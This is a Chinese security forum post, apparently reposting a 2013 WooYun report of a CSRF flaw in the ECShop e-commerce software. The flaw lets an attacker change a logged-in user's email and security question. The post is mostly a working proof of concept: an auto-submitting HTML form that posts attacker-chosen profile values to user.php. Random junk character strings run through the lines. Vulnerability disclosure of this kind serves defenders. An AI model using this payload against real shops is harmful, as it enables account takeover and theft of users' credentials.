找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2046|回复: 0
打印 上一主题 下一主题

ecshop修改任意用户密码漏洞的CSRF利用

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-20 08:30:14 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
简要描述:
- f" a4 w6 i& r# `- D- \ecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现
3 x0 F) s# T$ j( Z3 T6 K' ]1 d2 \0 F' Q
Demo For:http://www.wooyun.org/bug.php?action=view&id=395
+ o! \; S) `5 }- D+ e5 t5 N
  A+ @2 k) \+ S% b* z/ [详细说明:: D' q1 d$ r0 l2 Y7 @
利用csrf和xss可以突破官方所说的“障碍”
0 @( B/ o+ @$ k! s9 M4 ~5 exss版本已经有人说明
4 I# N! [. p1 Q: {4 q+ s6 e这里给出csrf版本- M+ h) @) _! B+ H% H0 @
4 @/ x, Q0 V9 B
漏洞证明:
5 E. T: P" P! d# z8 X<html>! \+ H5 Z# x% n' f
<body>
8 U( O& d: i) z, c<form action="http://www.wooyun.org/ecshop/user.php" method="POST">( I) ?" m0 B2 y
<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">$ b* h$ R4 i# Z
<INPUT TYPE="text" NAME="act" value="act_edit_profile">
$ x/ u+ H/ E8 ^& H3 g. Z<INPUT TYPE="text" NAME="sel_question" value="ecshop">
' d$ g. }) A4 |* K3 N, j! a# T  u) |<INPUT TYPE="text" NAME="passwd_answer" value="exploit">
! O& a" Y$ E+ Q' Y1 r</body>
. I7 I! A) N! Z1 L% |<script>1 }3 y' W( R) a) b0 {/ }7 c  N
document.forms[0].submit();
0 a* Q) c  l' z8 ^</script>, |6 M3 ?1 G& n- K+ c
</html>
! h7 R. c0 `! {; q7 I  Q# @% r构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失; R% |% |4 j4 q

* f5 o" o/ z: A- w
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表